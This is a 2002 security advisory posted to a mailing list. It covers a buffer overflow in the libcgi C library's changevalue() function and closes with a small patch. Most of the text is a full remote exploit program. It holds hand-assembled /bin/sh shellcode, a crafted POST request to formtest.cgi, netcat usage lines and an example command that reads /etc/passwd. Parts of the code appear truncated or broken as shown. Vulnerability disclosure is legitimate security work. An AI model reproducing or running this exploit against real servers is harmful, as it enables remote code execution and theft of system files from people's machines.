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Remote Frame Pointer Overwrite vulnerability in LIB CGI in Language C.

From: "dong-h0un U" <xploit () hackermail com>
Date: Wed, 27 Nov 2002 15:05:01 +0800

        INetCop Security Advisory #2002-0x82-007

* Title: Remote Frame Pointer Overwrite vulnerability in LIB CGI in Language C.

0x01. Description

A simple mode of develop CGI in language C.
The libcgi package is a library written in pure C for C programmers or,
programmers with some experience in language C that want development CGI in language C.
This Project includes two libraries that has example practice to use of the same.
(libcgi, lib-mysql)

Vulnerability of problem happens in the 76 line of 'Include/libcgi.h'.
Let's examine. :-)

    69  void changevalue(char mt[],char *pt)
    70  {
    71     char buffer[256]={'\0'}; // 256
    72     int size=(strlen(pt)); // pt size.
    73     int x,y;
    74     for(x=0,y=0;x<size;x++,y++) // ??
    75     {
    76        buffer[y]=pt[x]; // Here !!
    77     }
    78     strcpy(mt,buffer); // Here's uneasy.
    79  }

According to use environment of function, can abuse overflow.

0x02. Vulnerable Packages

Vendor site: http://www.bigadmin.kit.net/libcgi/

+Slackware Linux
+Debian Linux
+RedHat Linux

0x03. Exploit

Good example that prove exploit is attached.
The CGI program uses changevalue().

Example CGI Program: /cgi-bin/formtest.cgi

let's examine source code.

     7     static char Name[32],Email[32],Home[64],Sel[24],Check[16],Radio[16],Comments[256];
    13     name=getbox("NAME");         changevalue(Name,name);
    14     email=getbox("EMAIL");       changevalue(Email,email);
    15     home=getbox("HOME");         changevalue(Home,home);
    16     sel=getbox("SEL");           changevalue(Sel,sel);
    17     check=getbox("CHECK");       changevalue(Check,check);
    18     radio=getbox("RADIO");       changevalue(Radio,radio);
    19     comments=getbox("COMMENTS"); changevalue(Comments,comments); // Here.

getbox() function, value input get to user.
lol, changevalue() is abused. :-)

This's exploit code that prove.
Through remote attack, get 'nobody' competence.

=== 0x82-libCGIfpxpl.c ===

** Remote Frame Pointer Overwrite LIB CGI in Language C exploit
**                          by Xpl017Elz in INetCop(c) Security
** __
** Proof of concept:
** bash$ (./0x82-libCGIfpxpl;cat)|nc 0 80
** HTTP/1.1 200 OK
** Date: Sat, 23 Nov 2002 18:41:14 GMT
** Server: Apache/1.3.26 (Unix) PHP/4.1.2
** Connection: close
** Content-Type: text/html
** <html>
** <head>
** <title>LIB CGI in Language C - Testing "libcgi.h" with Url Encoding -
** by Marcos Luiz Onisto , bigadmin () uol com br</title>
** ...
** 8282828282828282828282828282828282828282828282828282 ...
** ...
** Happy Exploit !
** Linux testsub 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown
** uid=99(nobody) gid=99(nobody) groups=99(nobody)
** __
** exploit by "you dong-h0un"(Xpl017Elz), <szoahc () hotmail com>. 
** My World: http://x82.i21c.net & http://x82.inetcop.org

#include <stdio.h>
#include <getopt.h>

#define Xpl017Elz x82
#define BUFSIZE 1024
#define DCOMM "printf \"\\n\\n\\nHappy Exploit !\\n\\n\";uname -a;id"

void banrl();
int main(argc,argv)
    int argc;
    char *argv[];
#define NOPSH 0xbffffc20
    unsigned long nopsh=NOPSH;
#define SHADR 0xbffffd60
    unsigned long shadr=SHADR;
    int whtp;
#define NULLS 0x00000000
    int num_0,num_1,num_2,num_3;
    int num_4,num_5;

    char input_code[]= /* It's true ! */
        "NAME=Xpl017Elz&EMAIL=szoahc () hotmail 
    char send_code[]=
        "&Submit=Send\n"; /* send */
#define COMMS 235
    char shc0mm[COMMS]=DCOMM;
    unsigned char x0x[BUFSIZE];
    char x0x2[BUFSIZE];

    int x0x_0_num=NULLS;
    int x0x_1_num=NULLS;

            case 'C':
            case 'c':
                    fprintf(stderr,"\n [-] String Error :-(\n\n");
            case 'S':
            case 's':
            case 'A':
            case 'a':
            case '?':
                    fprintf(stderr,"\n Usage: %s -opt args\n",argv[0]);
                    fprintf(stderr,"\n\t-s [addr] - shellcode");
                    fprintf(stderr,"\n\t-a [addr] - &shellcode");
                    fprintf(stderr,"\n\t-c [cmd]  - command\n");
                    fprintf(stderr,"\n Example: %s -s %p -a %p -c 'cat /etc/passwd'\n\n",argv[0],nopsh,shadr);
    //--- make shellcode :-) ---//
    /* This is dong-h0un U style */
    num_1=strlen(shc0mm)+0x0c; num_2=num_1+0x01;
    num_3=num_2+0x04; num_4=num_3+0x04; num_5=num_4+0x04;
    x0x[num_0++]=0xeb; x0x[num_0++]=0x30; x0x[num_0++]=0x5e;  
    x0x[num_0++]=0x89; x0x[num_0++]=0x76; x0x[num_0++]=num_2;
    x0x[num_0++]=0x31; x0x[num_0++]=0xc0; x0x[num_0++]=0x88;
    x0x[num_0++]=0x46; x0x[num_0++]=0x08; x0x[num_0++]=0x88; 
    x0x[num_0++]=0x46; x0x[num_0++]=0x0b; x0x[num_0++]=0x88; 
    x0x[num_0++]=0x46; x0x[num_0++]=num_1;x0x[num_0++]=0x89; 
    x0x[num_0++]=0x46; x0x[num_0++]=num_5;x0x[num_0++]=0xb0;  
    x0x[num_0++]=0x0b; x0x[num_0++]=0x8d; x0x[num_0++]=0x5e;
    x0x[num_0++]=0x09; x0x[num_0++]=0x89; x0x[num_0++]=0x5e;
    x0x[num_0++]=num_3;x0x[num_0++]=0x8d; x0x[num_0++]=0x5e;
    x0x[num_0++]=0x0c; x0x[num_0++]=0x89; x0x[num_0++]=0x5e;
    x0x[num_0++]=num_4;x0x[num_0++]=0x89; x0x[num_0++]=0xf3;
    x0x[num_0++]=0x8d; x0x[num_0++]=0x4e; x0x[num_0++]=num_2;
    x0x[num_0++]=0x8d; x0x[num_0++]=0x56; x0x[num_0++]=num_5; 
    x0x[num_0++]=0xcd; x0x[num_0++]=0x80; x0x[num_0++]=0x31;
    x0x[num_0++]=0xc0; x0x[num_0++]=0xb0; x0x[num_0++]=0x01;
    x0x[num_0++]=0xcd; x0x[num_0++]=0x80; x0x[num_0++]=0xe8;
    x0x[num_0++]=0xcb; x0x[num_0++]=0xff; x0x[num_0++]=0xff;
    x0x[num_0++]=0xff; x0x[num_0++]=0x2f; x0x[num_0++]=0x2f;
    x0x[num_0++]=0x62; x0x[num_0++]=0x69; x0x[num_0++]=0x6e;        
    x0x[num_0++]=0x2f; x0x[num_0++]=0x73; x0x[num_0++]=0x68;  
    x0x[num_0++]=0x20; x0x[num_0++]=0x2d; x0x[num_0++]=0x63;
    //--- execute formtest.cgi ---//
    fprintf(stdout,"POST /cgi-bin/formtest.cgi HTTP/1.0\n");
    fprintf(stdout,"Connection: close\n");
    fprintf(stdout,"User-Agent: ");

    //--- put shellcode ---//

    //--- put &shellcode ---//
    fprintf(stdout,"%s\n",x0x); /* &shellcode */

    //--- set type ---//
    fprintf(stdout,"Host: x82 was here.\n");
    fprintf(stdout,"Content-type: application/x-www-form-urlencoded\n");

    //--- put &(&shellcode) ---//
        *(long*)&x0x[x0x_0_num]=shadr; /* &(&shellcode) */

    //--- size, code send ---//
    fprintf(stdout,"Content-length: %d\n\n",strlen(x0x2));
      How to exploit?
      Use netcat ! 
      bash$ (./0x82-libCGIfpxpl;cat)|nc 0 80
      This is frame pointer overwrite.
      Must investigate all shellcode address and &shellcode address.
      [nop] [shellcode] [&shellcode]
                 ^          | ^
                 |          | |
                 +----------+ +------* (-a option).
                 (-s option)

      ex) 0x82828282: 0x90909090 0x90909090 0x90909090 0x90909090
              ...         ...        ...        ...        ...
          0x8282bab0: 0x82828282 0x82828282 0x82828282 0x82828282

      It may be work that is very interesting. :-)
      bash$ (./0x82-libCGIfpxpl -s 0x82828282 -a 0x8282bab0;cat)|nc 0 80
      Only, code may create instruction that you want.
      Shellcode does not worry. (-c option)
      bash$ (./0x82-libCGIfpxpl -c "echo 'x82 was here.';";cat)|nc 0 80


void banrl()
    fprintf(stdout,"\n Remote Frame Pointer Overwrite LIB CGI in Language C exploit");
    fprintf(stdout,"\n                          by Xpl017Elz in INetCop(c) Security\n");

=== eof ===

0x04. Patch

=== http.patch ===

--- libcgi.h    Tue Feb 13 22:23:00 1996
+++ libcgi.patch.h      Thu Nov 21 14:01:21 2002
@@ -69,7 +69,7 @@
 void changevalue(char mt[],char *pt)
    char buffer[256]={'\0'};
-   int size=(strlen(pt));
+   int size=256;//(strlen(pt));
    int x,y;

=== eof ===

P.S: Sorry, for my poor english.

By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,

INetCop Security Home: http://www.inetcop.org (Korean hacking game)
             My World: http://x82.i21c.net

GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y

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